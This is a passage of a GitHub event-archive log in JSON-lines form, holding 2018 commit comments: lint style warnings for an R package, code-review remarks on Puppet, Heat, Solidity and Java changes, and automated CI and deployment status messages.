^~~~~~~~\n```\n[R/plotting.R:6:41:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/plotting.R#L6) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                              na.color, zero.color, length){\n                                        ^~~~~~~~~~\n```\n[R/plotting.R:37:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/plotting.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        na.color, zero.color, length) {\n                        ^~~~~~~~\n```\n[R/plotting.R:37:35:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/plotting.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        na.color, zero.color, length) {\n                                  ^~~~~~~~~~\n```\n[R/plotting.R:86:22:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/plotting.R#L86) *style:* **Put spaces around all infix operators.**\n```r\n​      eval(parse(text=deparse(elems[[useElem]])), envir=tmp@.envir),\n                    ~^~\n```\n[R/plotting.R:86:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/plotting.R#L86) *style:* **Put spaces around all infix operators.**\n```r\n​      eval(parse(text=deparse(elems[[useElem]])), envir=tmp@.envir),\n                                                      ~^~\n```\n[R/plotting.R:87:12:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n          ~^~\n```\n[R/plotting.R:87:40:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n                                      ~^~\n```\n[R/plotting.R:87:74:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n                                                                        ~^~\n```\n[R/POM.R:128:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/POM.R#L128) *style:* **Lines should not be more than 100 characters.**\n```r\n​#' @param objFnCompare Character string. Either, \"MAD\" or \"RMSE\" indicating that inside the objective\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/POM.R:186:12:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/POM.R#L186) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​           NaNRetries = NA, logObjFnVals = FALSE, weights, useLog = FALSE) {\n           ^~~~~~~~~~\n```\n[R/POM.R:196:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/POM.R#L196) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        NaNRetries, logObjFnVals, weights, useLog) {\n                        ^~~~~~~~~~\n```\n[R/POM.R:213:28:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/POM.R#L213) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    if (is.na(NaNRetries)) NaNRetries <- 1\n                           ^~~~~~~~~~\n```\n[R/POM.R:237:11:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/POM.R#L237) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​          sim_ <- Copy(sim)\n          ^~~~\n```\n[R/POM.R:255:66:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/POM.R#L255) *style:* **Put spaces around all infix operators.**\n```r\n​          envPOMCalled <- sys.frame(min(grep(\"POM\", sys.calls()))-1)\n                                                                ~^~\n```\n[R/POM.R:322:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/POM.R#L322) *style:* **Lines should not be more than 100 characters.**\n```r\n​          cat(format(unlist(lapply(objectiveRes, function(x) x[[\"value\"]])), digits = 4), dep = \"\\t\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/POM.R:360:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/POM.R#L360) *style:* **Lines should not be more than 100 characters.**\n```r\n​      par[whP] <- unlist(deps[[modName]]@parameters$default[deps[[modName]]@parameters$paramName == names(P(sim, modName)[whParamsByMod[whP]])])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n"}},"created_at":"2018-07-09T19:08:18Z"}
{"id":"7939535635","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29646399,"position":null,"line":null,"path":null,"commit_id":"bf041db2e847a71667cf2d3220051eb9ea31feb0","created_at":"2018-07-09T19:08:20Z","updated_at":"2018-07-09T19:08:20Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 495](https://ci.hashicorp.engineering/viewLog.html?buildId=102008&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-09T19:08:20Z"}
{"id":"7939538480","type":"CommitCommentEvent","actor":{"login":"lootsy"},"repo":{"name":"leonidlezner/circlefinder"},"payload":{"comment":{"id":29646409,"position":14,"line":94,"path":"config/app.php","commit_id":"dac337902839ed97c389433c53ae5c929da73ff6","created_at":"2018-07-09T19:08:58Z","updated_at":"2018-07-09T19:08:58Z","author_association":"NONE","body":"I would prefer \"en_US\" as fallback. But I think that's a matter of taste. ;)"}},"created_at":"2018-07-09T19:08:58Z"}
{"id":"7939540085","type":"CommitCommentEvent","actor":{"login":"nombrekeff"},"repo":{"name":"nombrekeff/npm-package"},"payload":{"comment":{"id":29646410,"position":null,"line":null,"path":null,"commit_id":"1e980e00833e1f690a6663ddffee96fa39d16755","created_at":"2018-07-09T19:09:19Z","updated_at":"2018-07-09T19:09:19Z","author_association":"OWNER","body":"Okey, i've done the fix for: [#1 @jesseditson/npm-package](https://github.com/jesseditson/npm-package/issues/1)\r\nNot very much changed though!\r\nHope it helps!"}},"created_at":"2018-07-09T19:09:19Z"}
{"id":"7939545583","type":"CommitCommentEvent","actor":{"login":"jongallion"},"repo":{"name":"lampo/discourse-financialpeace-theme"},"payload":{"comment":{"id":29646423,"position":22,"line":315,"path":"common/head_tag.html","commit_id":"a7ec105536ac4cefe7ccacb6165d503f5f9ecc24","created_at":"2018-07-09T19:10:29Z","updated_at":"2018-07-09T19:10:29Z","author_association":"CONTRIBUTOR","body":"This should probably use a variable instead of a path for the source. The production hosting will probably still have paths like `/uploads/default/original/1X/d9cecb0d3392116c6111c1c356cff35960813a5b.png`"}},"created_at":"2018-07-09T19:10:29Z"}
{"id":"7939548951","type":"CommitCommentEvent","actor":{"login":"DikangGu"},"repo":{"name":"cooldoger/cassandra"},"payload":{"comment":{"id":29646428,"position":6,"line":58,"path":"src/java/org/apache/cassandra/dht/tokenallocator/TokenAllocation.java","commit_id":"5195288f12cecb9faccea9d35328144a66d77f59","created_at":"2018-07-09T19:11:11Z","updated_at":"2018-07-09T19:11:11Z","author_association":"NONE","body":"@cooldoger , I explicitly made it work with 0 replication factor case in this jira, https://issues.apache.org/jira/browse/CASSANDRA-12983?filter=-2.  This change will break the behavior in that situation, right?"}},"created_at":"2018-07-09T19:11:11Z"}
{"id":"7939549236","type":"CommitCommentEvent","actor":{"login":"jongallion"},"repo":{"name":"lampo/discourse-financialpeace-theme"},"payload":{"comment":{"id":29646429,"position":22,"line":315,"path":"common/head_tag.html","commit_id":"a7ec105536ac4cefe7ccacb6165d503f5f9ecc24","created_at":"2018-07-09T19:11:14Z","updated_at":"2018-07-09T19:11:14Z","author_association":"CONTRIBUTOR","body":"This should probably use a variable instead of a path for the source. The production hosting will probably still have paths like `/uploads/default/original/1X/d9cecb0d3392116c6111c1c356cff35960813a5b.png`"}},"created_at":"2018-07-09T19:11:14Z"}
{"id":"7939555511","type":"CommitCommentEvent","actor":{"login":"ASBishop"},"repo":{"name":"PranaliDeore/puppet-tripleo"},"payload":{"comment":{"id":29646447,"position":null,"line":null,"path":null,"commit_id":"f85e1e007677ea802b114d5c69ea28246c02ee90","created_at":"2018-07-09T19:12:37Z","updated_at":"2018-07-09T19:12:37Z","author_association":"NONE","body":"This is looking good, with just a couple comments. It will eventually need a unit test, but lets get whole solution working, and add unit test coverage when it's time to submit upstream."}},"created_at":"2018-07-09T19:12:37Z"}
{"id":"7939556229","type":"CommitCommentEvent","actor":{"login":"ASBishop"},"repo":{"name":"PranaliDeore/puppet-tripleo"},"payload":{"comment":{"id":29646452,"position":48,"line":48,"path":"manifests/profile/base/glance/netapp.pp","commit_id":"f85e1e007677ea802b114d5c69ea28246c02ee90","created_at":"2018-07-09T19:12:46Z","updated_at":"2018-07-09T19:12:46Z","author_association":"NONE","body":"As mentioned above, this conditional can be eliminated if $netapp_share had no default value."}},"created_at":"2018-07-09T19:12:46Z"}
{"id":"7939556406","type":"CommitCommentEvent","actor":{"login":"ASBishop"},"repo":{"name":"PranaliDeore/puppet-tripleo"},"payload":{"comment":{"id":29646453,"position":42,"line":42,"path":"manifests/profile/base/glance/netapp.pp","commit_id":"f85e1e007677ea802b114d5c69ea28246c02ee90","created_at":"2018-07-09T19:12:48Z","updated_at":"2018-07-09T19:12:48Z","author_association":"NONE","body":"I still don't like this file name :-/\r\nI feel the .conf extension is misleading, so suggest at least give it a .json extension."}},"created_at":"2018-07-09T19:12:48Z"}
{"id":"7939556546","type":"CommitCommentEvent","actor":{"login":"ASBishop"},"repo":{"name":"PranaliDeore/puppet-tripleo"},"payload":{"comment":{"id":29646454,"position":40,"line":40,"path":"manifests/profile/base/glance/netapp.pp","commit_id":"f85e1e007677ea802b114d5c69ea28246c02ee90","created_at":"2018-07-09T19:12:49Z","updated_at":"2018-07-09T19:12:49Z","author_association":"NONE","body":"Giving a default value (undef) makes this an optional parameter. instead, just put the comma after \"$netapp_share\" and it forces the other code (that includes this class) to supply a value. That will let you eliminate the conditional on L48."}},"created_at":"2018-07-09T19:12:49Z"}
{"id":"7939556860","type":"CommitCommentEvent","actor":{"login":"ASBishop"},"repo":{"name":"PranaliDeore/puppet-tripleo"},"payload":{"comment":{"id":29646456,"position":1,"line":1,"path":"manifests/profile/base/glance/netapp.pp","commit_id":"f85e1e007677ea802b114d5c69ea28246c02ee90","created_at":"2018-07-09T19:12:53Z","updated_at":"2018-07-09T19:12:53Z","author_association":"NONE","body":"2018"}},"created_at":"2018-07-09T19:12:53Z"}
{"id":"7939558758","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29646461,"position":null,"line":null,"path":null,"commit_id":"6b9f389cb8356a2c88757c9c8be01c883376052e","created_at":"2018-07-09T19:13:18Z","updated_at":"2018-07-09T19:13:18Z","author_association":"COLLABORATOR","body":"<h3>[Omnibar] fix example (#2645)</h3>\n\nPreview: <strong><a href='https://17968-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://17968-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://17968-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-09T19:13:18Z"}
{"id":"7939560039","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29646466,"position":null,"line":null,"path":null,"commit_id":"0471e6a4726e83cdc240bef1571cc460305699cd","created_at":"2018-07-09T19:13:33Z","updated_at":"2018-07-09T19:13:33Z","author_association":"COLLABORATOR","body":"<h3>update readme for 3.0, yarn dev:all -> dev (#2654)</h3>\n\nPreview: <strong><a href='https://17970-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://17970-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://17970-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-09T19:13:33Z"}
{"id":"7939562796","type":"CommitCommentEvent","actor":{"login":"yeltnar"},"repo":{"name":"yeltnar/ws-expose-server"},"payload":{"comment":{"id":29646477,"position":null,"line":null,"path":null,"commit_id":"b2d6bc7fc35b447074c7a053762cc87d06c899ae","created_at":"2018-07-09T19:14:10Z","updated_at":"2018-07-09T19:14:10Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/8839f9f8-ee5d-429f-8749-52267c653952?env_id=ibm%3Ayp%3Aus-south \"ws-expose\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/5c41e84d-5968-4649-8c7b-52afb41b0a6e?env_id=ibm%3Ayp%3Aus-south \"ws-expose-pipeline\") deployed [ws-expose-server](https://github.com/yeltnar/ws-expose-server/releases/tag/deploy-ibm-yp-us-south-andcbrant-gmail.com-dev-20180709-191409 \"deploy-ibm-yp-us-south-andcbrant-gmail.com-dev-20180709-191409\") to [dev](https://console.bluemix.net/apps/e68f5516-a561-42c7-ac49-af54fea27ed3?env_id=ibm:yp:us-south \"ibm:yp:us-south:andcbrant@gmail.com:dev\"), including this commit"}},"created_at":"2018-07-09T19:14:10Z"}
{"id":"7939564613","type":"CommitCommentEvent","actor":{"login":"dejiayinde"},"repo":{"name":"dejiayinde/ratemds"},"payload":{"comment":{"id":29646483,"position":null,"line":null,"path":null,"commit_id":"81e1250c327d436eb35be1d9973080cdbb0782e4","created_at":"2018-07-09T19:14:33Z","updated_at":"2018-07-09T19:14:33Z","author_association":"OWNER","body":"\r\n[rateMds.txt](https://github.com/dejiayinde/ratemds/files/2177661/rateMds.txt)\r\n"}},"created_at":"2018-07-09T19:14:33Z"}
{"id":"7939568501","type":"CommitCommentEvent","actor":{"login":"andergmartins"},"repo":{"name":"AllediaWordPress/UpStream"},"payload":{"comment":{"id":29646499,"position":null,"line":null,"path":null,"commit_id":"f766df1cef2ef266f2019389efe562eccb325b09","created_at":"2018-07-09T19:15:23Z","updated_at":"2018-07-09T19:15:23Z","author_association":"CONTRIBUTOR","body":"Fixes #572"}},"created_at":"2018-07-09T19:15:23Z"}
{"id":"7939572052","type":"CommitCommentEvent","actor":{"login":"ASBishop"},"repo":{"name":"PranaliDeore/puppet-glance"},"payload":{"comment":{"id":29646510,"position":null,"line":null,"path":null,"commit_id":"f77342021d44550de099161d17854ec25bc36e11","created_at":"2018-07-09T19:16:08Z","updated_at":"2018-07-09T19:16:08Z","author_association":"NONE","body":"Looks great, except I'd not put much detail in the commit message (which also has a typo: \"conatins\"). I don't think it's necessary to explain what the parameters do, and why we want to add them. I think you can keep it simple by just saying something like \"Add the ability to configure Glance's filesystem_store_metadata_file and filesystem_store_metadata_perms options.\""}},"created_at":"2018-07-09T19:16:08Z"}
{"id":"7939572212","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29646511,"position":null,"line":null,"path":null,"commit_id":"516b9b4a1fee2106d624e85285a20c6c6d501bea","created_at":"2018-07-09T19:16:10Z","updated_at":"2018-07-09T19:16:10Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-34](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-34).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-34-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-09T19:16:10Z"}
{"id":"7939572782","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29646513,"position":null,"line":null,"path":null,"commit_id":"9b66d2faed5d0482d89290c01a13db0673a8dfd9","created_at":"2018-07-09T19:16:16Z","updated_at":"2018-07-09T19:16:16Z","author_association":"OWNER","body":"Build version: __`0.10.0-master.208`__ :crossed_fingers: [`master`](https://github.com/streamich/ci-scripts/tree/master) on [*CircleCI*](https://circleci.com/gh/streamich/ci-scripts/208) :tada:"}},"created_at":"2018-07-09T19:16:16Z"}
{"id":"7939574446","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29646516,"position":null,"line":null,"path":null,"commit_id":"bf041db2e847a71667cf2d3220051eb9ea31feb0","created_at":"2018-07-09T19:16:37Z","updated_at":"2018-07-09T19:16:37Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 495](https://ci.hashicorp.engineering/viewLog.html?buildId=102008&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **SUCCESS**\nSummary: Running Build time: 00:08:17"}},"created_at":"2018-07-09T19:16:37Z"}
{"id":"7939574448","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29646517,"position":null,"line":null,"path":null,"commit_id":"ea864e2dc1a978340f58371923543931c6e015bc","created_at":"2018-07-09T19:16:37Z","updated_at":"2018-07-09T19:16:37Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 496](https://ci.hashicorp.engineering/viewLog.html?buildId=102010&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-09T19:16:37Z"}
{"id":"7939580396","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29646536,"position":null,"line":null,"path":null,"commit_id":"9b66d2faed5d0482d89290c01a13db0673a8dfd9","created_at":"2018-07-09T19:17:53Z","updated_at":"2018-07-09T19:17:53Z","author_association":"OWNER","body":"Build version: __`0.10.0-master.315`__ :crossed_fingers: [`master`](https://github.com/streamich/ci-scripts/tree/master) on [*Travis*](https://travis-ci.org/streamich/ci-scripts/builds/401911312) :tada:"}},"created_at":"2018-07-09T19:17:53Z"}
{"id":"7939583961","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"furqanbaqai/FundsSplitter"},"payload":{"comment":{"id":29646542,"position":73,"line":84,"path":"contracts/FundsSplitter.sol","commit_id":"af7e603c9ebd15fdfa0de8a238e3ba0a41346c0d","created_at":"2018-07-09T19:18:38Z","updated_at":"2018-07-09T19:18:38Z","author_association":"NONE","body":"Need to emit an event. Consider `returns(bool success)` - admittedly a matter preference. "}},"created_at":"2018-07-09T19:18:38Z"}
{"id":"7939588979","type":"CommitCommentEvent","actor":{"login":"GarethWright"},"repo":{"name":"carlos8f/bot18"},"payload":{"comment":{"id":29646550,"position":null,"line":null,"path":null,"commit_id":"90ab8baffa3b4aaa686d0d4d36ace2fabb7a72a9","created_at":"2018-07-09T19:19:41Z","updated_at":"2018-07-09T19:19:41Z","author_association":"COLLABORATOR","body":"Clarified install requirements"}},"created_at":"2018-07-09T19:19:41Z"}
{"id":"7939589225","type":"CommitCommentEvent","actor":{"login":"ASBishop"},"repo":{"name":"PranaliDeore/tripleo-heat-templates"},"payload":{"comment":{"id":29646551,"position":5,"line":16,"path":"environments/storage/glance-nfs.yaml","commit_id":"2c9d711557266049b70c635af78aa75e84c05c6b","created_at":"2018-07-09T19:19:44Z","updated_at":"2018-07-09T19:19:44Z","author_association":"NONE","body":"The comment doesn't really make sense (neither did the original comment). And i hope I don't drive you crazy, but I may have reasons for not changing the parameter name from GlanceNetappNfsEnabled. Don't worry about changing it back, but we can discuss later."}},"created_at":"2018-07-09T19:19:44Z"}
{"id":"7939592029","type":"CommitCommentEvent","actor":{"login":"meltsufin"},"repo":{"name":"spring-cloud/spring-cloud-gcp"},"payload":{"comment":{"id":29646552,"position":29,"line":206,"path":"spring-cloud-gcp-pubsub/src/main/java/org/springframework/cloud/gcp/pubsub/PubSubAdmin.java","commit_id":"d3dea6a125e7d475c8a529b3f45f5a5be68a3c72","created_at":"2018-07-09T19:20:19Z","updated_at":"2018-07-09T19:20:19Z","author_association":"COLLABORATOR","body":"In this particular case, `javac` won't even use the `StringBuilder` because it's a concatenation of constants that will be replaced with `\"The acknowledgement deadline must be between 10 and 600 seconds.\"` and compile time."}},"created_at":"2018-07-09T19:20:19Z"}
{"id":"7939592867","type":"CommitCommentEvent","actor":{"login":"BelRija"},"repo":{"name":"BelRija/myChat"},"payload":{"comment":{"id":29646556,"position":null,"line":null,"path":null,"commit_id":"8d0facc2627a585459c66089b7ae99b1a333701b","created_at":"2018-07-09T19:20:30Z","updated_at":"2018-07-09T19:20:30Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/c65cbe3a-93c6-404b-bfcf-fdc329794a72?env_id=ibm%3Ayp%3Aeu-de \"myChat\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/8082f571-1fcd-44eb-8182-121978b3d23f?env_id=ibm%3Ayp%3Aeu-de \"myChat\") deployed [myChat](https://github.com/BelRija/myChat/releases/tag/deploy-ibm-yp-eu-de-Marija.Belova-Student.Reutlingen-University.DE-dev-20180709-192029 \"deploy-ibm-yp-eu-de-Marija.Belova-Student.Reutlingen-University.DE-dev-20180709-192029\") to [dev](https://console.bluemix.net/apps/d1062cbe-ed7c-49cf-afef-28924e703e96?env_id=ibm:yp:eu-de \"ibm:yp:eu-de:Marija.Belova@Student.Reutlingen-University.DE:dev\"), including this commit"}},"created_at":"2018-07-09T19:20:30Z"}
{"id":"7939594544","type":"CommitCommentEvent","actor":{"login":"copumpkin"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29646564,"position":null,"line":null,"path":null,"commit_id":"631dd7a4e974547b9ff483401e5256fa5aa3797e","created_at":"2018-07-09T19:20:51Z","updated_at":"2018-07-09T19:20:51Z","author_association":"MEMBER","body":"Thanks! That sounds good. I'll fix up the package later 😄 "}},"created_at":"2018-07-09T19:20:51Z"}
{"id":"7939594949","type":"CommitCommentEvent","actor":{"login":"ASBishop"},"repo":{"name":"PranaliDeore/tripleo-heat-templates"},"payload":{"comment":{"id":29646565,"position":10,"line":117,"path":"puppet/services/glance-api.yaml","commit_id":"2c9d711557266049b70c635af78aa75e84c05c6b","created_at":"2018-07-09T19:20:57Z","updated_at":"2018-07-09T19:20:57Z","author_association":"NONE","body":"We will probably need to retain this parameter or we might break existing deployments. I will discuss this further elsewhere in the review."}},"created_at":"2018-07-09T19:20:57Z"}
{"id":"7939596014","type":"CommitCommentEvent","actor":{"login":"bobbieltd"},"repo":{"name":"MoneroOcean/nodejs-pool"},"payload":{"comment":{"id":29646568,"position":null,"line":null,"path":null,"commit_id":"12d701aefc4df554cfe154bfd13f82825107a9ad","created_at":"2018-07-09T19:21:10Z","updated_at":"2018-07-09T19:21:10Z","author_association":"NONE","body":"You should remove gtest compilation part (it is compiled without -fPIC). It will cause error with monero compilation (Issue https://github.com/monero-project/monero/issues/3688 )"}},"created_at":"2018-07-09T19:21:10Z"}
{"id":"7939599695","type":"CommitCommentEvent","actor":{"login":"kyzyltanatuva"},"repo":{"name":"kyzyltanatuva/hello-world"},"payload":{"comment":{"id":29646573,"position":null,"line":null,"path":null,"commit_id":"6e52e2d21b33c888ee2c6ae33d8545a6437fdde2","created_at":"2018-07-09T19:21:56Z","updated_at":"2018-07-09T19:21:56Z","author_association":"OWNER","body":"\r\n\r\n\r\n\r\n[junk.txt](https://github.com/kyzyltanatuva/hello-world/files/2177653/junk.txt)\r\n\r\n\r\n"}},"created_at":"2018-07-09T19:21:56Z"}
{"id":"7939601948","type":"CommitCommentEvent","actor":{"login":"ASBishop"},"repo":{"name":"PranaliDeore/tripleo-heat-templates"},"payload":{"comment":{"id":29646578,"position":30,"line":324,"path":"puppet/services/glance-api.yaml","commit_id":"2c9d711557266049b70c635af78aa75e84c05c6b","created_at":"2018-07-09T19:22:23Z","updated_at":"2018-07-09T19:22:23Z","author_association":"NONE","body":"This might need to be \"[ ]\" (an empty list)."}},"created_at":"2018-07-09T19:22:23Z"}
{"id":"7939603615","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"furqanbaqai/FundsSplitter"},"payload":{"comment":{"id":29646581,"position":null,"line":null,"path":null,"commit_id":"af7e603c9ebd15fdfa0de8a238e3ba0a41346c0d","created_at":"2018-07-09T19:22:45Z","updated_at":"2018-07-09T19:22:45Z","author_association":"NONE","body":"Looking great. These practice projects are to unfold things for you and help you prepare for the increased complexity that lies ahead. As a suggestion, you might experiment with inheritance now. \r\n\r\nConsider\r\n\r\nOwnable.sol\r\n```\r\ncontract Ownable { ...\r\n```\r\n\r\nPausable.sol\r\n```\r\nimport \"./Ownable.sol\";\r\ncontract Pausable is Ownable { ...\r\n```\r\n\r\nFundsSplitter.sol\r\n```\r\nimport \"./Pausable.sol\";\r\ncontract FundsSplitter is Pausable { ...\r\n```\r\n\r\nPerhaps surprisingly, you can play around with that in Remix. Watch how the state variables, events, functions and modifiers inherit up to FundsSplitter. "}},"created_at":"2018-07-09T19:22:45Z"}
{"id":"7939606857","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"OpenGreekAndLatin/First1KGreek"},"payload":{"comment":{"id":29646584,"position":null,"line":null,"path":null,"commit_id":"6633644f0b456df3dbb5ce0eb5530d6a1c861822","created_at":"2018-07-09T19:23:25Z","updated_at":"2018-07-09T19:23:25Z","author_association":"NONE","body":"## Words\n\n| Changed   |   Status |\n|:----------|---------:|\n| `grc`     |      -46 |\n\n*[Hook UI build recap](http://ci.perseids.org/repo/OpenGreekAndLatin/First1KGreek/4426)*\n"}},"created_at":"2018-07-09T19:23:25Z"}
{"id":"7939607967","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29646586,"position":null,"line":null,"path":null,"commit_id":"8a7f7d6f776766877ad6790104bde49a6bc29894","created_at":"2018-07-09T19:23:39Z","updated_at":"2018-07-09T19:23:39Z","author_association":"NONE","body":"158913899-Add-single-sided-natural-ventilation-example-file (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1683 of 1683 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8a7f7d6f776766877ad6790104bde49a6bc29894-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8a7f7d6f776766877ad6790104bde49a6bc29894-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8a7f7d6f776766877ad6790104bde49a6bc29894-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.0%25-green.png)</a>\n"}},"created_at":"2018-07-09T19:23:39Z"}
{"id":"7939609280","type":"CommitCommentEvent","actor":{"login":"artembilan"},"repo":{"name":"spring-cloud/spring-cloud-gcp"},"payload":{"comment":{"id":29646589,"position":29,"line":206,"path":"spring-cloud-gcp-pubsub/src/main/java/org/springframework/cloud/gcp/pubsub/PubSubAdmin.java","commit_id":"d3dea6a125e7d475c8a529b3f45f5a5be68a3c72","created_at":"2018-07-09T19:23:55Z","updated_at":"2018-07-09T19:23:55Z","author_association":"CONTRIBUTOR","body":"Ah! Good catch! Thank you! \r\nNever mind then.\r\nLooks like I need more vacation or just don't go there at all 😉  "}},"created_at":"2018-07-09T19:23:55Z"}
